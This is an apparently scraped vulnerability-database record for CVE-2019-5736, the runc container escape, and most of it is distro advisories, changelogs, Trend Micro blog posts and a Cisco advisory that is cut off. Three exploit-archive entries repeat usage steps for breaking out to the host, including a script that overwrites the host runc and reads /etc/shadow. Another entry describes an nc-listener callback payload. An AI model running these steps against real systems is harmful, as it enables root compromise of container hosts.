"bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "LXCFS is a simple userspace filesystem designed to work around some current limitations of the Linux kernel. Specifically, it's providing two main things - A set of files which can be bind-mounted over their /proc originals to provide CGroup-aware values. - A cgroupfs-like tree which is container aware. The code is pretty simple, written in C using libfuse. The main driver for this work was the need to run systemd based containers as a regular unprivileged user while still allowing systemd inside the container to interact with cgroups. Now with the introduction of the cgroup namespace in the Linux kernel, that part is no longer necessary on recent kernels and focus is now on making containers feel more like a real independent system through the proc masking feature. ", "modified": "2019-09-06T12:59:40", "published": "2019-09-06T12:59:40", "id": "FEDORA:37FA36077DE7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: lxcfs-3.0.4-1.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Linux Resource Containers provide process and resource isolation without the overhead of full virtualization. ", "modified": "2019-09-06T12:59:39", "published": "2019-09-06T12:59:39", "id": "FEDORA:B42946075886", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: lxc-3.0.4-1.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "LXCFS is a simple userspace filesystem designed to work around some current limitations of the Linux kernel. Specifically, it's providing two main things - A set of files which can be bind-mounted over their /proc originals to provide CGroup-aware values. - A cgroupfs-like tree which is container aware. The code is pretty simple, written in C using libfuse. The main driver for this work was the need to run systemd based containers as a regular unprivileged user while still allowing systemd inside the container to interact with cgroups. Now with the introduction of the cgroup namespace in the Linux kernel, that part is no longer necessary on recent kernels and focus is now on making containers feel more like a real independent system through the proc masking feature. ", "modified": "2019-09-06T12:35:28", "published": "2019-09-06T12:35:28", "id": "FEDORA:E3C59624D00E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: lxcfs-3.0.4-1.fc30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-12-08T13:29:38", "bulletinFamily": "unix", "cvelist": ["CVE-2020-15257"], "description": "[1.3.9-2]\n- BUILDINFO: commit=4737bd3784f16c18474a60d8678371108f995d7c\n- Addresses CVE-2020-15257\n[1.3.9-1]\n- Added Oracle specific build files", "edition": 2, "modified": "2020-12-03T00:00:00", "published": "2020-12-03T00:00:00", "id": "ELSA-2020-5964", "href": "http://linux.oracle.com/errata/ELSA-2020-5964.html", "title": "containerd security update", "type": "oraclelinux", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-12-05T05:23:20", "bulletinFamily": "unix", "cvelist": ["CVE-2020-16845", "CVE-2020-15257", "CVE-2020-13401", "CVE-2020-15157", "CVE-2019-5736"], "description": "docker-cli\n[19.03.11-7]\n- Fix for CVE-2020-15257\n[19.03.11-6]\n- Fix for CVE-2020-15157\n[19.03.11-5]\n- Bugfix for 'docker images [name]' not working on docker 19.03.11-ol\n- Address CVE-2020-16845\n[19.03.11-4]\n- added patch for registry list\n[19.03.11-3]\n- update to 19.03.11 for CVE-2020-13401\n[19.03.1-1.0.0]\n- update to 19.03.1\n[19.03-0.0.1]\n- update to 19.03\n[18.09.1-1.0.6]\n- disable kmem accounting for UEKR4\n[18.09.1-1.0.5]\n- apply e4931e664feac6fa8846f3f04268a0cc98822549, fixes CVE-2019-5736\n[18.09.1-1.0.4]\n- fix authentication error when using docker hub and using --default-registry\n[18.09.1-1.0.3]\n- fix authentication errors when using docker hub\n[18.09-1.0.0]\n- rename to docker-cli\n[18.09-0.0.1]\n- merge docker-engine.spec changes by Oracle into docker-ce-cli.spec from\n upstream 18.09 branch\ndocker-engine\n[19.03.11-7]\n- Fix for CVE-2020-15257\n[19.03.11-6]\n- Fix for CVE-2020-15157\n[19.03.11-5]\n- Bugfix for 'docker images [name]' not working on docker 19.03.11-ol\n- Address CVE-2020-16845\n[19.03.11-4]\n- added patch for registry list\n[19.03.11-3]\n- update to 19.03.11 for CVE-2020-13401\n[19.03.1-1.0.0]\n- update to 19.03.1\n[19.03-0.0.1]\n- update to 19.03\n[18.09.1-1.0.6]\n- disable kmem accounting for UEKR4\n[18.09.1-1.0.5]\n- apply e4931e664feac6fa8846f3f04268a0cc98822549, fixes CVE-2019-5736\n[18.09.1-1.0.4]\n- fix authentication error when using docker hub and using --default-registry\n[18.09.1-1.0.3]\n- fix authentication errors when using docker hub\n[18.09.1-1.0.2]\n- use epoch in container-selinux dependency\n[18.09.1-1.0.1]\n- fix 'docker cp doesn't work for btrfs' (OLM-158)\n- update build to Go 1.10.8\n[18.09.1-1.0.0]\n- update to 18.09.1\n[18.09-1.0.0]\n- rename back to docker-engine, rename dockerd-ce to dockerd and stop\n using alternatives\n[18.09-0.0.1]\n- merge docker-engine.spec changes by Oracle into docker-ce.spec from upstream\n 18.09 branch\n[18.03.1.ol-0.0.7]\n- fix [orabug 28452214] and [orabug 28461404]\n[18.03.1.ol-0.0.6]\n- obsolete/provide the docker package [orabug 28216396]\n- Fix docker plugin reference resolution [orabug 28376247]\n[18.03.1.ol-1.0.4]\n- Fixed issue where RPM overwrites config files\n[17.12.0.ol-1.0.1]\n- Update docker-engine package for upstream 17.12.0\n[17.09.1.ol-1.0.2]\n- Update docker-engine package for upstream 17.09.1\n[17.06.2.ol-1.0.1]\n- Update docker-engine package for upstream 17.06.2 [orabug 26673768]\n- Migrate to new 'ol'-based versioning\n- add docker-storage-config utility\n[17.03.1-ce-3.0.1]\n- Update docker-engine package for upstream 17.03.1\n- Enable configuration of Docker daemon via sysconfig [orabug 21804877]\n- Require UEK4 for docker 1.9 [orabug 22235639 22235645]\n- Add docker.conf for prelink [orabug 25147708]\n- Update oracle linux selinux policy to match upstream [orabug 25653794]\n- Use dockerd instead of docker daemon as it is deprecated [orabug 25653794]", "edition": 2, "modified": "2020-12-05T00:00:00", "published": "2020-12-05T00:00:00", "id": "ELSA-2020-5966", "href": "http://linux.oracle.com/errata/ELSA-2020-5966.html", "title": "docker-cli docker-engine security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T17:13:50", "bulletinFamily": "unix", "cvelist": ["CVE-2018-15664", "CVE-2019-14271"], "description": "docker-engine\n[19.03.1-1.0.0]\n- update to 19.03.1\n[19.03-0.0.1]\n- update to 19.03", "edition": 3, "modified": "2019-12-05T00:00:00", "published": "2019-12-05T00:00:00", "id": "ELSA-2019-4827", "href": "http://linux.oracle.com/errata/ELSA-2019-4827.html", "title": "docker-engine docker-cli security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-30T19:25:00", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "container-selinux\n[2:2.94-1.git1e99f1d]\n- Resolves: #1690286 - bump to v2.94\n- Resolves: #1693806, #1689255\n[2:2.89-1.git2521d0d]\n- bump to v2.89\nrunc\n[1.0.0-55.rc5.dev.git2abd837]\n- Resolves: CVE-2019-5736", "edition": 2, "modified": "2019-07-30T00:00:00", "published": "2019-07-30T00:00:00", "id": "ELSA-2019-0975", "href": "http://linux.oracle.com/errata/ELSA-2019-0975.html", "title": "container-tools:rhel8 security and bug fix update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:07", "description": "\nrunc 1.0-rc6 (Docker 18.09.2) - Container Breakout (2)", "edition": 1, "published": "2019-02-13T00:00:00", "title": "runc 1.0-rc6 (Docker 18.09.2) - Container Breakout (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-13T00:00:00", "id": "EXPLOITPACK:A525E32FDF6F1ECE16D67E1741C48E11", "href": "", "sourceData": "## CVE-2019-5736 ##\n\nThis is exploit code for CVE-2019-5736 (and it works for both runc and LXC).\nThe simplest way to use it is to copy the exploit code into an existing\ncontainer, and run `make.sh`. However, you could just as easily create a bad\nimage and run that.\n\n```console\n% docker run --rm --name pwnme -dit ubuntu:18.10 bash\npwnme\n% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar\n```\n\nWe need to install `gcc` to build the exploit, and `runc` because we need to\nhave the shared libraries that `runc` would use. We don't actually use the\n`runc` binary itself. For LXC, you would install `lxc` instead of `runc`.\n\n```console\n% docker attach pwnme\n# apt-get update && apt-get install -y gcc runc\n[ snip ]\n# tar xf CVE-2019-5736.tar\n# ./CVE-2019-5736/make.sh\n```\n\nAnd now, `/bin/bash` in the container will be able to **overwrite the host runc\nbinary**. Since this binary is often executed by `root`, this allows for\nroot-level code execution on the host.\n\n```\n% docker exec -it pwnme /bin/bash\n[+] bad_libseccomp.so booted.\n[+] opened ro /proc/self/exe <3>.\n[+] constructed fdpath </proc/self/fd/3>\n[+] bad_init is ready -- see </tmp/bad_init_log> for logs.\n[*] dying to allow /proc/self/exe to be unused...\n% cat /usr/sbin/docker-runc\n#!/bin/bash\ntouch /w00t_w00t ; cat /etc/shadow\n```\n\nAnd now if you try to use Docker normally, the malicious script will execute\nwith root privileges:\n\n```\n% docker exec -it pwnme /bin/good_bash\nOCI runtime state failed: invalid character 'b' looking for beginning of value: unknown\n% file /w00t_w00t\n/w00t_w00t: empty\n```\n\nAnd obviously `make.sh` can be modified to make the evil path anything you\nlike. If you want to get access to the container, use `/bin/good_bash`.\n\n### License ###\n\n```\nCopyright (C) 2019 Aleksa Sarai <cyphar@cyphar.com>\nVulnerability discovered by Adam Iwaniuk and Borys Pop\u0142awski.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to\ndeal in the Software without restriction, including without limitation the\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\nsell copies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\n* The above copyright notice and this permission notice shall be included in\n all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\n```\n\n\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2019-03-01T16:18:24", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5736"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how a group of hackers is stealing popular Instagram profiles. Also, learn about old and new cybersecurity issues inundated enterprises in 2018.\n\nRead on:\n\n[**Insecure VPNs: Top risks and symptoms that stronger security is needed**](<https://blog.trendmicro.com/insecure-vpns-top-risks-and-symptoms-that-stronger-security-is-needed/>)\n\n_While users hope and expect that VPNs will live up to their name and truly support a virtual and private connection, research shows that this is not always the case._** **\n\n[**U.S. Cyber Command Operation Disrupted Internet Access of Russian Troll Factory on Day of 2018 Midterms**](<https://www.washingtonpost.com/world/national-security/us-cyber-command-operation-disrupted-internet-access-of-russian-troll-factory-on-day-of-2018-midterms/2019/02/26/1827fc9e-36d6-11e9-af5b-b51b7ff322e9_story.html?noredirect=on&utm_term=.910d209f6acb>)\n\n_The U.S. military blocked Internet access to an infamous Russian entity seeking to cause discord among Americans during the 2018 midterms._** **\n\n[**How a Hacking Group is Stealing Popular Instagram Profiles**](<https://blog.trendmicro.com/trendlabs-security-intelligence/how-a-hacking-group-is-stealing-popular-instagram-profiles/>)\n\n_Trend Micro found that targeting popular Instagram profiles has become a modus for a certain group of Turkish-speaking hackers through phishing attacks and digital extortion._** **\n\n[**Attackers Continue to Focus on Users, Well-Worn Techniques**](<https://www.darkreading.com/threat-intelligence/attackers-continue-to-focus-on-users-well-worn-techniques/d/d-id/1333960>)\n\n_According to Trend Micro\u2019s 2018 Roundup Report, traditional attacks such as phishing and credential stuffing continue to dominate the threat landscape for most industries while well-known malware remain a threat for behind-the-curve companies._** **\n\n[**CVE-2019-5736: RunC Container Escape Vulnerability Provides Root Access to the Target Machine**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/cve-2019-5736-runc-container-escape-vulnerability-provides-root-access-to-the-target-machine>)\n\n_CVE-2019-5736 is a vulnerability involving the runC runtime component, which is used for container platforms such as Docker and container orchestration platforms such as Kubernetes._** **\n\n[**Congress Considers a National Standard for Data Privacy**](<https://www.zdnet.com/article/congress-considers-a-national-standard-for-data-privacy/>)\n\n_The conversations on nationwide data privacy rules kicked off with a hearing in a subpanel of the House Energy and Commerce Committee._** **\n\n[**Caught in the Net: Unraveling the Tangle of Old and New Threats**](<https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/unraveling-the-tangle-of-old-and-new-threats>)\n\n_Trend Micro saw a shift in cybercriminal strategies and lingering security threats. Enterprises faced a multitude of challenges, but careful study of these issues can present opportunities for improvement.__ _\n\n**[Europe is Prepared to Rule Over 5G Cybersecurity](<https://techcrunch.com/2019/02/25/europe-is-prepared-to-rule-over-5g-cybersecurity/>)**\n\n_At Mobile World Congress, the European Commission\u2019s digital commissioner warned the mobile industry to expect it to act over security concerns attached to Chinese network equipment makers, including Huawei._\n\nDo you think there will be more attacks on high-profile social media accounts or influencers this year? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Instagram Hackers and Enterprise Threats](<https://blog.trendmicro.com/this-week-in-security-news-instagram-hackers-and-enterprise-threats/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-03-01T14:57:50", "published": "2019-03-01T14:57:50", "id": "TRENDMICROBLOG:A8C47E018FA9A3D0723FC3A99FD592A7", "href": "https://blog.trendmicro.com/this-week-in-security-news-instagram-hackers-and-enterprise-threats/", "type": "trendmicroblog", "title": "This Week in Security News: Instagram Hackers and Enterprise Threats", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-20T09:44:48", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5736"], "description": "\n\nThis week a new vulnerability was published ([CVE-2019-5736](<https://nvd.nist.gov/vuln/detail/CVE-2019-5736>)) that highlights everything bad and good about containers. Simply put, this vulnerability can be exploited using an infected container to attack the host. It\u2019s a real world example of a breakout attack that has long been a major concern in virtualized and container environment.\n\nHere, the attack highlights the biggest security weakness of containers: they are loosely isolated sharing the same host operating system. This is in stark contrast to virtual machines which are isolated instances of a complete operating system.\n\n## CVE-2019-5736\n\nThe vulnerability itself can be exploited by an attacker using a custom container or by gaining write access to an existing container. They then can manipulate the symbolic process link (/proc/self/exe/) in order to overwrite the runC library. [runC](<https://github.com/opencontainers/runc>) is portable, lightweight container runtime. It\u2019s a critical piece of container infrastructure.\n\nIn this attack, once runC is overwritten and under the attackers control, they own the host and\u2014potentially\u2014any container running on it.\n\nThat\u2019s a devastating foothold and is why this vulnerability has a CVSSv3 score of 7.2 or \u201chigh\u201d. A score this high means that you should mitigate or fix the vulnerability as soon as possible.\n\n> For Trend Micro customers using Deep Security to protect their container hosts, [this knowledge base article](<https://success.trendmicro.com/solution/1122066>) explains the rules that you can use to both detect and prevent this issue until you have the opportunity to deploy a patch to your infrastructure.\n\n## A Container Refresher\n\nWhen reading about a vulnerability like this, the natural question to ask is, \u201cWhy isn\u2019t there a firmer line between containers on the same host?\u201d. The answer is a complicated one.\n\nTo start with, containers are not designed to solve security challenges. They were designed to tackle a very specific development challenge: dependency nightmares.\n\nAny application you write is built on layers of other teams code. Whether it\u2019s the framework you\u2019re using directly, standard libraries provided by your programming language, services made available by the OS, or even resources provided in hardware, you code does not stand alone.\n\nThis leads to a web of interdependencies and requirements for your code to run. For a very long time, developers faced a challenge documenting all of these dependencies and ensuring they were met in production environments.\n\nIf you\u2019ve ever heard a developer exclaim, \u201cIt worked on my machine!\u201d. You understand the problem.\n\nContainers were designed to make it easy to package all of an applications dependencies in a portable fashion. This helps with deployment, versioning, and a number of other delivery challenges.\n\nIn this respect containers are a fantastic step forward for developer efficiency.\n\n## The Downside of Containers\n\nThis efficiency for developers comes at the cost of infrastructure complexity. Often overlooked is the security of the container host, network complexity, and the integrity of the build pipeline.\n\nIn the case of CVE-2019-5736, the container host\u2019s security is paramount. Hardening the hosts operating system by reducing the number of available services\u2014it should only run the container runtime, host security controls, and host monitoring applications\u2014to the bare minimum is critical to security success.\n\nFurthermore, using security controls like integrity monitoring, log inspection, and application control will ensure that you hardened configuration **stays** that way.\n\nThis vulnerability demonstrates that each container can be risk to the host. The easiest analogy here comes from noted container expert [Kelsey Hightower](<https://twitter.com/kelseyhightower?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), he compared virtual machines to single houses (isolated, rarely impacting their neighbours) and containers to apartments. If you upstairs neighbour is always banging on the floor, you have a problem.\n\nCVE-2019-5736 is the distinct possibility of having a neighbour who throws a crazy party that trashes not only their own apartment but the hall, elevator, and lobby. Everyone has to deal with that mess.\n\n## The Upside\n\nThis issue also demonstrates the upside of the container model. Containers are designed for a highly automated and dynamic environment. In order to resolve this issue, the container runtime will need to be protected and then patched.\n\nThese measures may impact the availability of each host. The advantage? You can simply spin up a new version of your container on an already protected or patched host.\n\nTake for example the list of [affected AWS services](<https://aws.amazon.com/security/security-bulletins/AWS-2019-002/>). In each of these cases, [a rolling update](<https://www.dropbox.com/sh/3vm31z18xrhvm2k/AABAHh7jwu2u1u7rpK4XZrf6a?dl=0>) or blue/green deployment is possible in order to address the issue within impacting your users.\n\nIf your CI/CD pipeline is setup\u2014and if you\u2019re using containers, it should be\u2014a simple re-deployment to known good hosts will mitigate the issue. This is a prime example of the advantages of a highly automated build pipeline.\n\nNo special processes are required. Simply mitigate or patch the hosts and run your build again. DevOps culture FTW.\n\n## Next Steps\n\nThis won\u2019t be the last security issue in your container environment. Containers were designed to improve developer efficiency. Security is a priority for the teams working on the projects\u2014like runC\u2014that make containers work but there will always be security issues that pop up.\n\nIf you\u2019re following best practices and have automated your build and deployment pipeline, these issues shouldn\u2019t impact your end users. At worst, it should mean adding a new security rule or two to your tool set, adding a new security test to your build (to prevent recurrence), and a rolling update.\n\nIt\u2019s also a reminder that the security of your container host is **paramount** to the security of your container infrastructure. Take this opportunity to review the security posture of these hosts and if you haven\u2019t already, deploy a strong set of security controls that include [integrity monitoring](<https://en.wikipedia.org/wiki/File_integrity_monitoring>) and [application control](<https://en.wikipedia.org/wiki/Whitelisting#Application_whitelists>).\n\nThe post [Attacking Containers and runC](<https://blog.trendmicro.com/attacking-containers-and-runc/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-02-12T19:22:35", "published": "2019-02-12T19:22:35", "id": "TRENDMICROBLOG:DD93FD0A6FE52A3DFF89C6F550E981D1", "href": "https://blog.trendmicro.com/attacking-containers-and-runc/", "type": "trendmicroblog", "title": "Attacking Containers and runC", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2019-02-14T11:30:04", "description": "", "published": "2019-02-13T00:00:00", "type": "exploitdb", "title": "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-13T00:00:00", "id": "EDB-ID:46369", "href": "https://www.exploit-db.com/exploits/46369", "sourceData": "## CVE-2019-5736 ##\r\n\r\nThis is exploit code for CVE-2019-5736 (and it works for both runc and LXC).\r\nThe simplest way to use it is to copy the exploit code into an existing\r\ncontainer, and run `make.sh`. However, you could just as easily create a bad\r\nimage and run that.\r\n\r\n```console\r\n% docker run --rm --name pwnme -dit ubuntu:18.10 bash\r\npwnme\r\n% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar\r\n```\r\n\r\nWe need to install `gcc` to build the exploit, and `runc` because we need to\r\nhave the shared libraries that `runc` would use. We don't actually use the\r\n`runc` binary itself. For LXC, you would install `lxc` instead of `runc`.\r\n\r\n```console\r\n% docker attach pwnme\r\n# apt-get update && apt-get install -y gcc runc\r\n[ snip ]\r\n# tar xf CVE-2019-5736.tar\r\n# ./CVE-2019-5736/make.sh\r\n```\r\n\r\nAnd now, `/bin/bash` in the container will be able to **overwrite the host runc\r\nbinary**. Since this binary is often executed by `root`, this allows for\r\nroot-level code execution on the host.\r\n\r\n```\r\n% docker exec -it pwnme /bin/bash\r\n[+] bad_libseccomp.so booted.\r\n[+] opened ro /proc/self/exe <3>.\r\n[+] constructed fdpath </proc/self/fd/3>\r\n[+] bad_init is ready -- see </tmp/bad_init_log> for logs.\r\n[*] dying to allow /proc/self/exe to be unused...\r\n% cat /usr/sbin/docker-runc\r\n#!/bin/bash\r\ntouch /w00t_w00t ; cat /etc/shadow\r\n```\r\n\r\nAnd now if you try to use Docker normally, the malicious script will execute\r\nwith root privileges:\r\n\r\n```\r\n% docker exec -it pwnme /bin/good_bash\r\nOCI runtime state failed: invalid character 'b' looking for beginning of value: unknown\r\n% file /w00t_w00t\r\n/w00t_w00t: empty\r\n```\r\n\r\nAnd obviously `make.sh` can be modified to make the evil path anything you\r\nlike. If you want to get access to the container, use `/bin/good_bash`.\r\n\r\n### License ###\r\n\r\n```\r\nCopyright (C) 2019 Aleksa Sarai <cyphar@cyphar.com>\r\nVulnerability discovered by Adam Iwaniuk and Borys Pop\u0142awski.\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to\r\ndeal in the Software without restriction, including without limitation the\r\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\r\nsell copies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\n* The above copyright notice and this permission notice shall be included in\r\n all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\r\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\r\nIN THE SOFTWARE.\r\n```\r\n\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46369"}], "zdt": [{"lastseen": "2019-02-25T07:57:31", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2019-02-15T00:00:00", "title": "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-15T00:00:00", "id": "1337DAY-ID-32182", "href": "https://0day.today/exploit/description/32182", "sourceData": "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)\r\n\r\n## CVE-2019-5736 ##\r\n\r\nThis is exploit code for CVE-2019-5736 (and it works for both runc and LXC).\r\nThe simplest way to use it is to copy the exploit code into an existing\r\ncontainer, and run `make.sh`. However, you could just as easily create a bad\r\nimage and run that.\r\n\r\n```console\r\n% docker run --rm --name pwnme -dit ubuntu:18.10 bash\r\npwnme\r\n% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar\r\n```\r\n\r\nWe need to install `gcc` to build the exploit, and `runc` because we need to\r\nhave the shared libraries that `runc` would use. We don't actually use the\r\n`runc` binary itself. For LXC, you would install `lxc` instead of `runc`.\r\n\r\n```console\r\n% docker attach pwnme\r\n# apt-get update && apt-get install -y gcc runc\r\n[ snip ]\r\n# tar xf CVE-2019-5736.tar\r\n# ./CVE-2019-5736/make.sh\r\n```\r\n\r\nAnd now, `/bin/bash` in the container will be able to **overwrite the host runc\r\nbinary**. Since this binary is often executed by `root`, this allows for\r\nroot-level code execution on the host.\r\n\r\n```\r\n% docker exec -it pwnme /bin/bash\r\n[+] bad_libseccomp.so booted.\r\n[+] opened ro /proc/self/exe <3>.\r\n[+] constructed fdpath </proc/self/fd/3>\r\n[+] bad_init is ready -- see </tmp/bad_init_log> for logs.\r\n[*] dying to allow /proc/self/exe to be unused...\r\n% cat /usr/sbin/docker-runc\r\n#!/bin/bash\r\ntouch /w00t_w00t ; cat /etc/shadow\r\n```\r\n\r\nAnd now if you try to use Docker normally, the malicious script will execute\r\nwith root privileges:\r\n\r\n```\r\n% docker exec -it pwnme /bin/good_bash\r\nOCI runtime state failed: invalid character 'b' looking for beginning of value: unknown\r\n% file /w00t_w00t\r\n/w00t_w00t: empty\r\n```\r\n\r\nAnd obviously `make.sh` can be modified to make the evil path anything you\r\nlike. If you want to get access to the container, use `/bin/good_bash`.\r\n\r\n### License ###\r\n\r\n```\r\nCopyright (C) 2019 Aleksa Sarai <[email\u00a0protected]>\r\nVulnerability discovered by Adam Iwaniuk and Borys Pop\u0142awski.\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to\r\ndeal in the Software without restriction, including without limitation the\r\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\r\nsell copies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\n* The above copyright notice and this permission notice shall be included in\r\n all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\r\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\r\nIN THE SOFTWARE.\r\n```\r\n\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip\r\n\n\n# 0day.today [2019-02-25] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32182"}, {"lastseen": "2019-02-25T08:13:22", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2019-02-12T00:00:00", "title": "runC < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-12T00:00:00", "id": "1337DAY-ID-32165", "href": "https://0day.today/exploit/description/32165", "sourceData": "runc< 1.0-rc6 (Docker < 18.09.2) - Host Command Execution\r\n\r\n# Usage\r\nEdit HOST inside `payload.c`, compile with `make`. Start `nc` and run `pwn.sh` inside the container.\r\n\r\n# Notes\r\n- This exploit is destructive: it'll overwrite `/usr/bin/docker-runc` binary *on the host* with the\r\npayload. It'll also overwrite `/bin/sh` inside the container.\r\n- Tested only on Debian 9.\r\n- No attempts were made to make it stable or reliable, it's only tested to work when a `docker exec\r\n<id> /bin/sh` is issued on the host.\r\n\r\nMore complete explanation [here](https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d).\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46359.zip\r\n\n\n# 0day.today [2019-02-25] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32165"}], "cisco": [{"lastseen": "2019-05-29T15:32:02", "bulletinFamily": "software", "cvelist": ["CVE-2019-5736"], "description": "A vulnerability in the Open Container Initiative runc CLI tool used by multiple products could allow an unauthenticated, remote attacker to escalate privileges on a targeted system.\n\nThe vulnerability exists because the affected software improperly handles file descriptors related to /proc/self/exe. An attacker could exploit the vulnerability either by persuading a user to create a new container using an attacker-controlled image or by using the docker exec command to attach into an existing container that the attacker already has write access to. A successful exploit could allow the attacker to overwrite the host's runc binary file with a malicious file, escape the container, and execute arbitrary commands with root privileges on the host system.\n\nThis advisory will be updated as additional information becomes available.\n\nThis advisory is available at the 